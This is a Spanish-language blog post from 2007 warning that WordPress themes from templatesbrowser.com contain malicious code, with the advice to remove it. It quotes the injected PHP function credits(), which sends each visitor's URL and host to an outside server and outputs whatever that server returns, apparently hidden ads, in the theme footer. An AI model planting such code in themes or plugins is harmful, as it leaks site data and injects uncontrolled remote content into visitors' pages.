Geek the Planet


Seguridad no image

Published on agosto 3rd, 2007 | by Angelfire

0

Código Malicioso en themes para WordPress

Leyendo en el blog de Andres Nieto me doy cuenta de este nuevo intento para perjudicar a los usuarios de WordPress, en este caso se trata de inserción de código malicioso en algunos themes descargados de sitios como templatesbrowser.com.

El código lo podemos ver en el archivo functions.php (dentro de nuestro theme por supuesto), lo que podemos ver es algo como lo siguiente:

<?php function credits() {
$url = "http://1.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
?>

Esta función la podemos ver incluida en el fichero footer.php:

Se trata de una conexión mediante sockets a la página de templatebrowser.com que nos devuelve los créditos del theme, al parecer se está utilizando igualmente esta función para meterle publicidad oculta al theme.

La solución:

Pues eliminar la función credits() del archivo functions.php y del footer.php.

Tags: , , ,


About the Author

Systems Engineering, Computer Systems Specialist, Social Engineering Specialist. Social Media Analyzer. Usability and SEO enthusiasm (Este es mi perfil de Twitter...)



Comments are closed.

Back to Top ↑